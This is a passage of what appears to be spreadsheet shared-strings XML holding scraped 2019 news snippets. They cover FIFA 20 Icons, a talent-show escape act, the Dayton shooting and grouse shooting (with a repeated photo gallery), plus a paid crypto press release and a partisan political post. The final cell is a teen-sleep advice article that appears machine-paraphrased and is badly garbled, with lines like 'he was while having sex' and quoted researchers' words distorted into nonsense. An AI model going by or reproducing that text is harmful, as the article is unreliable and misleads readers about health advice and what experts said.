    <t>As the release of FIFA 20 nears, many fans will be wondering which legendary players will be appearing as ‘Icons’ in the game’s Ultimate Team mode. Luckily, EA Sports have been announcing the fabled players that will be joining the line-up. Each will have three variations: a “Peak” version which represents the player during a career-best snapshot in time, and two other variants that still pack a statistical punch. They join the returning line-up of iconic players who debuted with FIFA 18, and the players who joined as part of last year’s FIFA 19. What are FUT Icons? FUT Icons are sought after players from history; iconic stars that can bolster your squad’s performance, but in turn are much harder to come by than the players of today. Each Icon has three different versions, each marking a certain stage in that player’s career, with the highest rated one known as a ‘Prime’ Icon. These will set you back millions of FIFA Coins if you’re looking to buy one. Who’s new in this year’s game? So far, six new Icons have been announced as appearing in the game by EA Sports, with nine more to be revealed. They are as follows: Didier Drogba (Image: EA Sports) Drogba made his breakthrough in 2003/04 with Marseille, where he added goal-scoring ability to his phenomenal physique to net 32 times in 55 matches and win the Ligue 1 Player of the Year award. The Ivorian moved to Chelsea in 2004, where his goals helped the club to four Premier League titles, four FA Cups, and three League Cups, cementing his status as a Blues icon with the deciding penalty to win Chelsea’s first ever UEFA Champions League title. Andrea Pirlo (Image: EA Sports) An elegant deep-lying playmaker known for his incredible vision and passing, Pirlo was an integral part of the AC Milan midfield that won the UEFA Champions League in 2003 and 2007. His domestic performances also transferred to the international stage, where he helped Italy to win the 2006 World Cup, picking up the Man of the Match award in the final. Pirlo ended his career in Serie A with four consecutive Serie A triumphs before finishing his career with a move to MLS. Zinedine Zidane One of the most talented players of all time, Zidane’s world-class skill and technique made football look unnaturally easy His performances on the biggest stage – two goals in the 1998 World Cup Final and one of the greatest volleys of all time in the 2002 UEFA Champions League Final – gave “Zizou” legendary status for both France and Real Madrid. Ronald Koeman (Image: EA Sports) A defender with a goal-scoring record to envy most of those playing in front of him, Koeman began his career in the Eredivisie with Gronigen and Ajax before netting 51 times to lead PSV to three consecutive league titles and the European Cup. He bettered the feat at Barcelona, with four consecutive LaLiga trophies to go alongside a second European Cup, reaching double figures for goals in all six seasons at the club. Carlos Alberto Alberto came to prominence at Fluminense where he showcased his skills as a technically-gifted defender, known for his ball skills as well as his defensive capabilities. After three years at Fluminense he joined Santos, during which time he captained Brazil to World Cup glory in 1970 and scored one of the greatest goals in the history of the tournament in the Final. After spending 14 years playing in Brazil, Alberto linked up with Pele at New York Cosmos, helping them to four league championships in his four years at the club. Ian Wright (Image: EA Sports) Wright was a relative latecomer to professional football, but that didn’t stop him from racking up the goals for both Crystal Palace and Arsenal, where he picked up the Golden Boot with 29 goals in his debut season for the North Londoners. His consistent goal-scoring talents helped lead the Gunners to a league and cup double in 1998, confirming his status as a club icon. More FIFA 20: When is FIFA 20 out? Release date, Volta mode details and everything else we know Fifa 20 demo release date: when it’s out, the teams and everything else you need to know Everything you need to know about the Fifa 20 closed beta Fifa 20 Career Mode changes: full list of new features, from female managers to customisation PES 2020: release date, demo, new Master League, why it’s called ‘eFootball’ and everything else we know Fortnite and FIFA ‘loot boxes’ could be banned under new US law proposals The post Fifa 20 icons: full list of all the new legends coming to Ultimate Team in this year’s game appeared first on inews.co.uk. The post Fifa 20 icons: full list of all the new legends coming to Ultimate Team in this year’s game appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>It’s easy to accuse TV judges of being over the top. Last night the judges appeared to get overwrought for Indonesian escape artist Demian Aditya when his sandbox escape appeared to go wrong. When he did not emerge from being smothered by sand the crew began yelling “get him out!” and a sledgehammer was used to smash the glass. Surely these judges know Australia’s Got Talent is not going to air someone’s death on TV, so why the panic? Not so fast… I was in the audience for this episode recording. For a split second even I thought something had gone awry. But it was all part of the act. This was good old fashioned stage hoodwinking from everybody and I totally fell for it. “Demian, if you didn’t die, I was just about to kill you. Oh my god, I was seriously in tears,” said Nicole Scherzinger. Shane Jacobson said, “I don’t like you very much. It’s the ultimate compliment because I genuinely thought it had gone horribly wrong, so you can go to hell for that. I thought I was going to witness the death of someone and what I just witnessed is the birth of a great illusionist. Without a doubt the best illusion I’ve seen on this stage.” Manu Fieldel added, “My heart was racing a thousand kilometres an hour and I had my phone in my hand for triple zero too.” It’s the difference between being in a live audience -when something could potentially go wrong- to watching in the post-production safety of your own couch. As Manu told me recently, “What you say is exactly the difference. If you see it Live, you don’t know what is going to happen. “(But a tragedy) wouldn’t make it on TV.” Aditya has previously been an illusionist on America’s Got Talent performing the same act, before being brought to Australia by producers. His act works every time for those who have never seen it, whether TV judges or cynical critics.</t>
  </si>
  <si>
    <t>Faye Dunaway was fired following early performances in Boston, Massachusetts in July. See full article at Film-news.co.uk » The post Faye Dunaway bombed on stage before firing from play – report appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>SNC-Lavalin announced last Friday disappointing results for its second quarter.</t>
  </si>
  <si>
    <t>Carolyn Cummins</t>
  </si>
  <si>
    <t>Demand for the resurging North Sydney office market will be tested with the sale by Blackrock's private fund of 2 Elizabeth Plaza</t>
  </si>
  <si>
    <t>Evin Priest</t>
  </si>
  <si>
    <t>Justin Thomas and Brooks Koepka lead a weather-interrupted second round at the Tour Championship in Atlanta, Georgia.</t>
  </si>
  <si>
    <t>Trivia and word buffs: test your knowledge with today's superquiz and Target.</t>
  </si>
  <si>
    <t>Ewan McGregor previously played the character in the three Star Wars prequel films released from 1999 to 2005. See full article at Film-news.co.uk » The post Ewan McGregor in talks to return as Obi-Wan Kenobi in Disney+ series appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Former Test captain Mark Taylor has slammed cricket’s player-controlled review system after it came back to bite Australia in the epic third Test.</t>
  </si>
  <si>
    <t>A lone gunman in body armor opened fire early Sunday in a “very safe,” historic entertainment district in Dayton, Ohio, killing at least nine people and igniting chaos in the crowded outdoor area before he was fatally shot by police seconds later, authorities said. Police identified the shooter as Connor Betts, 24, of nearby Bellbrook. The names of those killed also were released and included Betts’ 22-year-old sister, Megan. More than two dozen people were wounded or injured. “Hundreds of people in the Oregon District could be dead today” if police hadn’t acted so quickly, Mayor Nan Whaley said. She said the city would conduct a vigil Sunday night. The assault was the nation’s second mass shooting in less than 24 hours. On Saturday, a 21-year-old gunman killed 20 and wounded 26 others at a Walmart in El Paso, Texas. » Subscribe to USA TODAY: http://bit.ly/1xa3XAh » USA TODAY delivers current local and national news, sports, entertainment, finance, technology, and more through award-winning journalism, photos, videos and VR. source</t>
  </si>
  <si>
    <t>Trump admin announces rule that could limit legal immigration Link: https://www.cnn.com/2019/08/12/politics/legal-immigration-public-charge/index.html The Trump Neo-Nazis want to tear down Lady Liberty. Trump Rule Targets Legal Immigrants Who Rely on Food Stamps and Other Aid Link: https://www.nytimes.com/2019/08/12/us/politics/trump-immigration-policy.html Trump Launches a War on Immigrants. 8/12/2019. Now, more than ever, IMPEACH DONALD TRUMP.</t>
  </si>
  <si>
    <t>Paralympic long-jumper Markus Rehm wants to see a closer relationship between the Olympics and Paralympics. The post ‘The Paralympics and the Olympics should be less separate’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The Telstra Art Award - with $50,000 for the winner - is the main prize in the Telstra National Aboriginal and Torres Strait Islander Art Awards (NATSIAA), held in Darwin each year. Attracting 280-odd entries from around the country, the short-listed and winning works are displayed at the Museum and Art Gallery of Northern Territory (MAGNT ) until November 3.</t>
  </si>
  <si>
    <t>NRL great Billy Moore believes it’s time for North Queensland coach Paul Green to move on from the club he took to their maiden premiership in 2015.</t>
  </si>
  <si>
    <t>Mi Swaco 1 FL Operator with Respirator Training Hire at Oceanex Oceanex Connaigra Trailers 18+1 Brother Gus F will hire. 3 WD Gangs Brother Billy J , Brother Johnny B &amp; Brother Jimmy B will hire. Autos 18+10 Brother Chris D will hire. Oceanex Yard 2 Stacker Operators Mike Y will hire. Mandatory Day in the Morning! Nomination Meeting Thursday Night August 15 2019 for VP Position 7 p.m. at the Union Hall. 687 Water Street</t>
  </si>
  <si>
    <t>Treasurer Josh Frydenberg says he would like to see the United States and China come together to prevent further escalation in the global trade war. Speaking to Sky News host Andrew Bolt on Monday night, Mr Frydenberg called for "cool heads to prevail". “These trade tensions are real, they’ve escalated, they’re not just rhetorical, they are playing out far and wide and Australia does get hit,” he said. “Despite some of the legitimate issues that the Americans have in their trade with China, we would like to see the two sides come to the negotiating table, resolve their differences and for cool heads to prevail.” Image: News Corp Australia</t>
  </si>
  <si>
    <t>MANANG'S FIRST PR HAUL! MANANG'S FIRST SPONSORSHIP! | CHARLOTTE F🍒 download video MANANG'S FIRST PR HAUL! MANANG'S FIRST SPONSORSHIP! | CHARLOTTE F🍒 fullhd download youtube review MANANG'S FIRST PR HAUL! MANANG'S FIRST SPONSORSHIP! |... The post MANANG'S FIRST PR HAUL! MANANG'S FIRST SPONSORSHIP! | CHARLOTTE F🍒 appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Plea hearing for Eurydice Dixon's murderer James Todd hears he had a long-held fascination with watching violent pornography that included simulated homicides.</t>
  </si>
  <si>
    <t>Stephen McDonell’s gas mask face visor was smashed as clashes in Hong Kong escalate. The post Hong Kong clashes: BBC reporter ‘hit in the face’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Labour has demanded an immediate review into grouse shooting amid fears the practice is causing substantial environmental damage. The call coincides with the start of the annual four-month-long grouse shooting season on Monday – referred to as the “Glorious Twelfth”, or “Inglorious Twelfth” by animal rights activists. An estimated 700,000 grouse are shot in the UK each year, and the League Against Cruel Sports charity describes it as a “massacre” of the animal. We’ll tell you what’s true. You can form your own view. From 15p €0.18 $0.18 USD 0.27 a day, more exclusives, analysis and extras. Subscribe now Labour claims alternatives to the practice, such as simulated shooting and wildlife tourism, could replace driven grouse shooting in Britain. The party makes clear today that if it wins power at the next general election, it will launch its own review into the practice, considering the alternatives, and examine the economic and environmental effects, if the Conservatives fail to do so. Due to the land where grouse shooting occurs being drained and dried out beforehand, Labour said the process “exacerbates climate change by destroying plant life and peat moors that would otherwise absorb and capture carbon dioxide emissions”. left Created with Sketch. right Created with Sketch. 1/50 11 August 2019 Manchester United’s Andreas Pereira (L) vies with Chelsea’s defender Kurt Zouma (R) during the English Premier League football match between Manchester United and Chelsea at Old Trafford in Manchester AFP/Getty 2/50 10 August 2019 People gather on the beach as a raft carrying people dressed as clowns heads to shore during the annual Whitby Regatta in Whitby, England. At over 170 years old, the Whitby Regatta is thought to be the oldest sea regatta on the northeast coast of England and draws thousands of visitors each year Getty 3/50 9 August 2019 Burryman Andrew Taylor, gets a nip of whisky using a straw, from resident Mary Hamblin, 82, as he parades through the town of South Queensferry, near Edinburgh, encased in burrs. The parade takes place on the second Friday of August each year and although the exact meaning of this tradition has been lost through the years it is thought to have begun in the 17th Century. The tradition is believed to bring good luck to the towns people if they give him whisky offered through a straw or a donation of money. PA 4/50 8 August 2019 A mosque is seen amongst residential housing from the air during a mass take off at the annual Bristol hot air balloon festival in Bristol. Reuters 5/50 7 August 2019 An Asiatic lioness eats meat during feeding time ahead of World Lion Day at London Zoo. Reuters 6/50 6 August 2019 Beer enthusiasts taste beer and ale during The Great British Beer Festival at Kensington Olympia in west London. The Great British Beer Festival, organised by the Campaign for Real Ale (CAMRA), brings hundreds of real ales, international beers and real ciders and perries under one roof. AFP/Getty Images 7/50 5 August 2019 Australia’s Nathan Lyon celebrates after taking the wicket of England’s Joe Root during day five of the first Ashes test at Edgbaston. The hosts were on the end of a thumping, as Australia won the first test by 251 runs. Getty 8/50 4 August 2019 Franky Zapata stands on his jet-powered “flyboard” prior to landing on St. Margaret’s Bay in Dover, during his attempt to fly across the 35-kilometre (22-mile) Channel crossing. The Frenchman achieved his aim today, on his second attempt, after having spent years developing the jet-powered hoverboard. AFP/Getty 9/50 3 August 2019 A Cricket fan wears a Donald Trump inflatable, during day three of the first Ashes test cricket match between England and Australia at Edgbaston in Birmingham. AP 10/50 2 August 2019 An RAF Chinook helicopter flies in sandbags to help repair the dam at Toddbrook Reservoir which was damaged in heavy rainfall. PA 11/50 1 August 2019 Stuart Broad celebrates after taking the wicket of David Warner during day one of the first Ashes test between England and Australia at Edgbaston. England fans celebrated the loss of David Warner and Cameron Bancroft dismissals by waving sandpaper after they both faced bans for their roles in the Sandpaper scandal last year. Australia were all out for 284 after Steve Smith frustrated the hosts with a total of 144. He helped drag his side from 122-8. Getty 12/50 31 July 2019 A collapsed bridge near Grinton, North Yorkshire, after parts of the region had up to 82.2mm of rain in 24 hours on Tuesday. PA 13/50 30 July 2019 Acrobats Beren d’Amico, Louis Gift and Charlie Wheeller, from Barely Methodical Troupe perform a routine on Calton Hill in Edinburgh as they bring their debut show Bromance to the Edinburgh Fringe PA 14/50 29 July 2019 Theresa the robotic waitress at The Tea Terrace’s Cobham branch in Surrey. Theresa represents the 6th Generation of robotic waitresses which were first launched in Japan a few years ago. The robot comes with autonomous navigation; automatic obstacle avoidance, voice conversation, and automatic dish delivery. It integrates core technologies in automatic control, multi-sensor perceptual collision avoidance and route planning PA 15/50 28 July 2019 Competitors during the World Stinging Nettle Eating Championship at The Bottle Inn in Marshwood. Competitors are served 2-foot long stalks of stinging nettles from which they pluck and eat as many leaves as possible. Getty 16/50 27 July 2019 A woman in character as La Muerte from film The Book of Life, during the MCM Manchester Comic Con which see thousands of sci-fi fans, gamers, comic collectors, movie buffs and anime enthusiasts visit Manchester Central PA 17/50 26 July 2019 England’s Jonny Bairstow takes the catch to dismiss Ireland’s William Porterfield during their test march at Lord’s. Ireland were bowled out for 38 in their second innings in just 15.4 overs – the second lowest total in Test match history Action Images via Reuters 18/50 25 July 2019 Hamza and Haris splash in the water feature beside the National Football Museum in central Manchester, as the UK braces itself to encounter the hottest July day on record PA 19/50 24 July 2019 Boris Johnson waves as he enters 10 Downing Street following his appointment as Prime Minster by the Queen. The former London mayor and foreign secretary won his leadership bid by beating Jeremy Hunt in the Tory race the day before. Theresa May stepped down following her resignation as Conservative Party leader on 7 June EPA 20/50 23 July 2019 Swimmers have fun in the sea on a giant inflatable Flamingo, South Beach,Tenby, Pembrokeshire Reuters 21/50 22 July 2019 New Liberal Democrat leader Jo Swinson addresses the audience onstage after she was named as Sir Vince Cable’s successor. Swinson beat fellow candidate Ed Davey by 47,997 votes to 28,021 votes Getty 22/50 21 July 2019 Adam Peaty broke his own world record in the men’s 100 metre breaststroke at the World Championships in Gwangju, South Korea. The 24-year-old smashed the previous record of 57.10 seconds he set at last year’s European Championships to win in 56.88. In doing so, the Britain achieved one of his career goals of becoming the first man to break the 57-second barrier in the event Reuters 23/50 20 July 2019 London artist Helen Marshall’s People’s Moon project, a giant photographic mosaic shown at the exact hour 50 years ago that Apollo 11 landed the first people on the Moon, at Piccadilly Circus, London PA 24/50 19 July 2019 Players from Uganda and Malawi during their Netball World Cup match at the M&amp;S Bank Arena, Liverpool PA 25/50 18 July 2019 Artist Steve Messam poses next to his monumental landscape artwork ‘Hush’ which hangs in the moors of Teesdale on July 18, 2019 in Barnard Castle, England. The outdoor installation is inspired by the geology, mining history and landscape of the area. The North Pennines AONB Partnership commissioned the installation which hangs over Bales Hush, a deep gauge in the terrain created when miners flushed the area with water to reveal the geological riches below. Hundreds of metres of recyclable saffron yellow fabric blow in the wind. Getty 26/50 17 July 2019 Buckingham Palace staff arrange the dining table, a copy of Queen Victoria’s reign dessert table, as part of an exhibition at Buckingham Palace, in London. The exhibition marks the 200th anniversary of the birth of Queen Victoria AP 27/50 16 July 2019 The Inveraray pipe band parades through the town at the start of the Highland Games in Inverarary, Scotland Getty 28/50 15 July 2019 Extinction Rebellion Activists block roads near the Tron Clock tower in Glasgow Getty 29/50 14 July 2019 Serbia’s Novak Djokovic raises the winner’s trophy after beating Switzerland’s Roger Federer during their men’s singles final on day thirteen of the 2019 Wimbledon Championships at The All England Lawn Tennis Club AFP/Getty 30/50 13 July 2019 The referee counts Nathan Gorman out as Daniel Dubois looks on during the British Heavyweight Title fight between Daniel Dubois and Nathan Gorman at The O2 Arena in London Getty 31/50 12 July 2019 Giant Panda, Yang Guang, exploring his new home at Edinburgh Zoo after moving in last week RZSS/PA 32/50 11 July 2019 England’s captain Eoin Morgan, left, celebrates with teammate Joe Root after winning their Cricket World Cup semi-final match against Australia at Edgbaston in Birmingham. The host nation blew away their rivals by 8 wickets with 107 balls remaining AP 33/50 10 July 2019 Andy Murray and Serena Williams talk as they play Bruno Soares and Nicole Melichar during their mixed doubles third round match of the Wimbledon Championships. The star-studded pair went out in three sets to the top seeds AFP/Getty 34/50 8 July 2019 Fifteen-year-old Cori “Coco” Gauff serves to Romania’s Simona Halep in a women’s singles match during day seven of the Wimbledon Tennis Championships in London. The youngest woman to qualify for Wimbledon in the open era defeated Venus Williams in her opening match and made if through to week two. Halep ended the teenagers dream run at the tournament in their round 16 match, 6-3, 6-3 AP 35/50 7 July 2019 A competitor takes part in the Red Bull Soapbox Race in Alexandra Park, London. The soapbox race is an international event in which amateur drivers race homemade soapbox vehicles on a downhill course PA 36/50 6 July 2019 Members of the Lesbian, Gay, Bisexual and Transgender (LGBT) community take part in the annual Pride Parade in London AFP/Getty Images 37/50 5 July 2019 Andy Murray fives mixed doubles partner Serena Williams at a practice session during day five of Wimbledon Getty Images 38/50 4 July 2019 Chelsea’s newly appointed head coach Frank Lampard gives a thumbs up as he poses at Stamford Bridge. The Blues confirmed a dramatic return for one of the club’s greatest ever players. He has signed a three-year contract with the Premier League club, where he spent 13 years and became the team’s all-time leading scorer with 211 goals AFP/Getty 39/50 3 July 2019 A grey seal named after Sir David Attenborough is released back into the wild after months being treated at RSPCA East Winch Wildlife Centre in Norfolk after it was found with a plastic frisbee disc embedded in its neck PA 40/50 2 July 2019 The Kirby Estate in London is decorated with St George flags ahead of the Women’s World Cup semi-final match between England and the USA PA 41/50 1 July 2019 People sleep as Glastonbury Festival 2019 comes to an end SWNS 42/50 30 June 2019 The crowd enjoys the atmosphere as Years &amp; Years perform on the Pyramid Stage during day five of the Glastonbury Festival at Worthy Farm, Pilton on June 30, 2019 in Glastonbury, England Getty 43/50 29 June 2019 A couple make their way across the sand with their belongings as people enjoy the sunshine and hot weather on Bournemouth Beach in Dorset. PRESS ASSOCIATION Photo. Picture date: Saturday June 29, 2019 PA 44/50 28 June 2019 A lion-tailed macaque stays cool in the hot weather by eating frozen treats with fruit at Camperdown Wildlife Centre, Dundee Katielee Arrowsmith / SWNS 45/50 27 June 2019 A festival goer dance with LED hula hoops on the second day of Glastonbury Festival 2019 PA 46/50 26 June 2019 Festival goers warm up prior to the gates opening at 8am on the first day of Glastonbury 2019 Adam Gray / SWNS 47/50 25 June 2019 An early glimpse of this year’s Glastonbury Festival is given in this picture taken by a local who glided over the site in their paramotor James Pearce / SWNS 48/50 24 June 2019 The interior roof of a Tesco shop collapses under the torrential rain in Stirling, Scotland on 24 June James Charity 49/50 23 June 2019 Steph Houghton celebrates with teammates after scoring England’s first goal during the Women’s World Cup round of 16 match against Cameroon at the Stade du Hainaut stadium in Valenciennes, France AP 50/50 22 June 2019 Pride marchers at a rally outside the Scottish Parliament in Edinburgh PA 1/50 11 August 2019 Manchester United’s Andreas Pereira (L) vies with Chelsea’s defender Kurt Zouma (R) during the English Premier League football match between Manchester United and Chelsea at Old Trafford in Manchester AFP/Getty 2/50 10 August 2019 People gather on the beach as a raft carrying people dressed as clowns heads to shore during the annual Whitby Regatta in Whitby, England. At over 170 years old, the Whitby Regatta is thought to be the oldest sea regatta on the northeast coast of England and draws thousands of visitors each year Getty 3/50 9 August 2019 Burryman Andrew Taylor, gets a nip of whisky using a straw, from resident Mary Hamblin, 82, as he parades through the town of South Queensferry, near Edinburgh, encased in burrs. The parade takes place on the second Friday of August each year and although the exact meaning of this tradition has been lost through the years it is thought to have begun in the 17th Century. The tradition is believed to bring good luck to the towns people if they give him whisky offered through a straw or a donation of money. PA 4/50 8 August 2019 A mosque is seen amongst residential housing from the air during a mass take off at the annual Bristol hot air balloon festival in Bristol. Reuters 5/50 7 August 2019 An Asiatic lioness eats meat during feeding time ahead of World Lion Day at London Zoo. Reuters 6/50 6 August 2019 Beer enthusiasts taste beer and ale during The Great British Beer Festival at Kensington Olympia in west London. The Great British Beer Festival, organised by the Campaign for Real Ale (CAMRA), brings hundreds of real ales, international beers and real ciders and perries under one roof. AFP/Getty Images 7/50 5 August 2019 Australia’s Nathan Lyon celebrates after taking the wicket of England’s Joe Root during day five of the first Ashes test at Edgbaston. The hosts were on the end of a thumping, as Australia won the first test by 251 runs. Getty 8/50 4 August 2019 Franky Zapata stands on his jet-powered “flyboard” prior to landing on St. Margaret’s Bay in Dover, during his attempt to fly across the 35-kilometre (22-mile) Channel crossing. The Frenchman achieved his aim today, on his second attempt, after having spent years developing the jet-powered hoverboard. AFP/Getty 9/50 3 August 2019 A Cricket fan wears a Donald Trump inflatable, during day three of the first Ashes test cricket match between England and Australia at Edgbaston in Birmingham. AP 10/50 2 August 2019 An RAF Chinook helicopter flies in sandbags to help repair the dam at Toddbrook Reservoir which was damaged in heavy rainfall. PA 11/50 1 August 2019 Stuart Broad celebrates after taking the wicket of David Warner during day one of the first Ashes test between England and Australia at Edgbaston. England fans celebrated the loss of David Warner and Cameron Bancroft dismissals by waving sandpaper after they both faced bans for their roles in the Sandpaper scandal last year. Australia were all out for 284 after Steve Smith frustrated the hosts with a total of 144. He hel...</t>
  </si>
  <si>
    <t>The two men in charge on the first day of the series between Australia and England managed to steal some of the headlines.</t>
  </si>
  <si>
    <t>The latest figures from the Department of Employment predicts intelligence and policy analysts jobs will increase by more than a third to 40,200 in the five years from May 2018 to May 2023.</t>
  </si>
  <si>
    <t>THE IRISHMAN, from Martin Scorsese and starring Robert De Niro, Al Pacino and Joe Pesci, is yet to have its cinema and Netflix release dates revealed, but there’s now a big clue. Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>George Pell has been returned to prison to serve out the remainder of his maximum six-year sentence after Victoria’s Court of Appeal upheld the decision of a jury that Pell is guilty of five child sex abuse charges. Sky News Political Editor David Speers and Chief Political Reporter Kieran Gilbert look at the key takeaways from the appeal court judges’ decision. Image: News Corp Australia</t>
  </si>
  <si>
    <t>5th August, Singapore, Singapore – BiKi.com announces a new strategic partnership with Ong Jun Hao, founder and CEO of BlockConnectors.io, one of Asia’s top blockchain advisory firms. With over 40 clients, they are also one of the only blockchain consultancy firms experienced in working with publicly listed companies. Ong will be one of the first official ambassadors of BiKi and will refer high quality projects to BiKi, including world premiere ICO projects. BiKi exchange will be the landing site for ICOs and existing projects with great potential and strong communities. Any project that has attained a certain level in terms of calibre will be recommended to Biki for its first listing. In addition, Ong will act as a strategic advisor to the young exchange in its plans for rapid and extensive expansion. Speaking on the brand new partnership, Biki.com Southeast Asia CEO, Ethan Ng states, “We are honoured that someone with such great foresight and esteemed reputation has decided to partner with us. His faith in BiKi is going to motivate us to work harder and innovate further as an exchange. We’ve managed to grow even during the bear market conditions in 2018 and are glad that Jun Hao saw something in us and has decided to grow together with us in our new plans for global expansion.” Ong Jun Hao is equally enthusiastic about the partnership. “I am excited to partner with BiKi to make it a global exchange. It is already one of the top few exchanges in the Chinese market but I believe in their Southeast Asia CEO Ethan Ng, that he will be able to gain market share in the international markets as well. Having known Ethan for over the past few years, I believe in his capability as well as that of the BiKi exchange team and am looking forward to achieving great things together in the near future.” “In terms of trading volume, BiKi is also one of the top few and I think this is reflective of what a great exchange they have become despite being so young,” adds Ong. Rated as one of the top advisors on established ICO review platform, ICO Bench, Ong has also been featured in the June edition of Crypto Investment Times as being one of the more prominent figures in the blockchain space. The Singapore Management University graduate was put under the spotlight when Singapore’s premium news publication Straits Times featured him as a cryptocurrency expert. A frequent speaker on global blockchain events, Ong has amassed over 50,000 followers on the various social media platforms as he continues to guide more people towards understanding the cryptocurrency market. About BiKi.com Headquartered in Singapore, BiKi.com is a global cryptocurrency exchange that provides a digital assets platform for trading more than 100 cryptocurrencies and 220 trading pairs. Since beginning operations in June 2018, BiKi.com is considered one of the fastest-growing cryptocurrency exchanges in the world with an accumulated 1.5 million registered users, 130,000 daily active users, and daily trading volumes of USDT 20 – 100 million. Company Contact: Chang Jie Lin, BiKi.com [email protected] Media Contact: Cecilia Wong, yourPRstrategist [email protected] This is a paid-for submitted press release. CCN does not endorse, nor is responsible for any material included below and isn’t responsible for any damages or losses connected with any products or services mentioned in the press release. CCN urges readers to conduct their own research with due diligence into the company, product or service mentioned in the press release.</t>
  </si>
  <si>
    <t>nocure</t>
  </si>
  <si>
    <t>BRUSHLESS HAMMER DRILL AND IMPACT DRIVER KIT $149. Kit includes: Brushless Hammer Drill (50Nm torque) and Brushless Impact Driver (200Nm torque), 2 x1.5Ah Xfinity batteries and charger, blow-moulded case for easy storage and 15pc accessories.</t>
  </si>
  <si>
    <t>Karl Quinn</t>
  </si>
  <si>
    <t>Researchers have unearthed rare photos of the woman who ran a string of high-end brothels just a short stroll from Parliament.</t>
  </si>
  <si>
    <t>It always seems like when I finally commit to making an effort to lose a few pounds, diabetes comes in to crush all my hopes and dreams. I find it can be very easy to Read more… The post 5 Ways to Not Let Lows Sabotage Your Weight Loss Efforts appeared first on Equalibras.</t>
  </si>
  <si>
    <t>Arabic Vietnamese Dictionary – travel dictionary to translate Arabic to Vietnamese. Click on the list to show Arabic or Vietnamese synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Vietnamese Dictionary →</t>
  </si>
  <si>
    <t>Rebecca Opie</t>
  </si>
  <si>
    <t>An Adelaide man accused of killing his elderly neighbour with a hammer in his western suburbs home is found not guilty of murder because of mental incompetence.</t>
  </si>
  <si>
    <t>Hundreds of firefighters are battling three wildfires in Greece, where two villages were being evacuated as the largest blaze burned a thickly forested nature reserve on the island of Evia north of Athens.</t>
  </si>
  <si>
    <t>Spanish Nepali Dictionary – travel dictionary to translate Spanish to Nepali. Click on the list to show Spanish or Nepali synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Spanish Nepali Dictionary →</t>
  </si>
  <si>
    <t>The recent escalation in the U.S.-China trade war has brought forward the next U.S. recession, according to a majority of economists polled by Reuters who now expect the Federal Reserve to cut rates again in September and once more next year.</t>
  </si>
  <si>
    <t>David Warner was out to Stuart Broad in single figures for the third time in three attempts in the series in an electric final hour at Lord's.</t>
  </si>
  <si>
    <t>PLAY ENGLISH UKRAINIAN FLASHCARDS FREE Select English or Ukrainian, then select your answer to the prompt word from the four options. Have fun 😉 Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>"The fact that he (Gillett) didn't train today I don't think we are likely to see him but hopefully next week," Brisbane teammate Alex Glenn said.</t>
  </si>
  <si>
    <t>The Pacific region's church leaders are asking Australia's Prime Minister to act to protect God's creation as he prepares to meet leaders in Tuvalu on Tuesday.</t>
  </si>
  <si>
    <t>Ben McKay and staff writers</t>
  </si>
  <si>
    <t>Collingwood big man Mason Cox is the latest Magpie to be grounded for the season.</t>
  </si>
  <si>
    <t>Tammy Mills</t>
  </si>
  <si>
    <t>Roberta Williams allegedly sent a message to Nicola Gobbo in 2006. That message was allegedly delivered by Tony Mokbel's brother.</t>
  </si>
  <si>
    <t>How Fathers and mothers Can Help Reduce the Quality of the Teen’s Get to sleep Within a few days of starting off high school the 2010 season, my ninth-grader could not throughout bed prior to 11 s. m. or even wake up by way of 6 the. m. He or she complained he / she couldn’t fall into deep sleep but sensed foggy in the school day time and had in order to reread training a few times the particular night to finish his homework. Together with forget early morning activities over the weekends — he was while having sex. We’re possibly not the only relatives struggling so you can get restful shut-eye. “What mothers and fathers are sharing with us could be that the ‘normal life’ of a typical Us high schooler is changing sleep, very well says Dorothy Clark, co-director of T. S. Mott Children’s The hospital National Survey on Children’s Health along at the University connected with Michigan. Inside poll of 2, 000 families from numerous ethnic categories and surroundings that Clark and the woman team released this month, 4 in 6 parents declare their teenage experiences typical sleep problems — “having hassle falling asleep or staying fallen 3 or maybe more nights every week. ” More than half the parents express it’s because most of their teens is not going to get off their whole electronic devices, in addition to 43 per-cent blame unpredictable schedules utilizing homework as well as activities. A tremendous percentage of parents say their own kids be worried about school (31 percent), together with 23 percentage say most of their teens remain up having to worry about their interpersonal lives. It can likely the fact that the numbers of young adults who have trouble sleeping is perhaps even higher than the actual poll of parents suggests, Clark says, given that kids might hide their whole nighttime consumer electronics use and oldsters may not repeatedly check in for older children. How parents aid? Start with knowing what small children need. Usually the American teenager gets eight hours for sleep the night, wedging it in the middle homework, out in the open activities, evening meal and maybe a position. But exploration suggests adolescence need more like nine several hours. Unfortunately, perhaps their bodies give good results against these people, says Martha Carskadon, a good longtime get to sleep researcher plus professor of psychiatry in addition to human behavior at Dark University. When children expand into the center and young adult years, they may be naturally incline bench press to go to cargo box later together with sleep in the future in the morning. But the early class start time doesn’t make it possible for it. “If kids’ physique clocks are actually shifting afterwards and the school is beginning earlier, there’s really no time quit to recover, inch Carskadon says. She plus Clark own evidence-based techniques for weary teens and their mothers and fathers: Put electronics away and even out of reach. Research has long displayed that display screen time disturbs good sleep due to the fact it’s exciting, and those “blue light filters” that lower the most aggravating part of the range won’t help much if you’re stressed out. So do whatever it takes for making sleep hrs electronics-free. “If I were definitely an entrepreneur, my get-rich-quick scam would be the spouse and children tech lockbox, ” tells Carskadon. (There are already several phone lockers in the gets results or in the marketplace that may work. ) Instill a regular bedtime routine. Try to transform the lamps out during around the same amount of time and wake at the same time, quite possibly on weekends, because the studies shows you still cannot really “make up” had missed sleep around the weekends. Sleep masques are useful, still avoid lengthy naps. Sleep masks can help create an environment conducive to rest, says Carskadon, as may trying to prevent sleepy young children from currently taking long, overdue afternoon naps. A 20-minute nap could possibly be refreshing, nevertheless longer nap sessions in the daytime can make it more difficult to get very good rest during the night. “The youngsters who battle most the particular night are the kinds who will often be falling asleep in 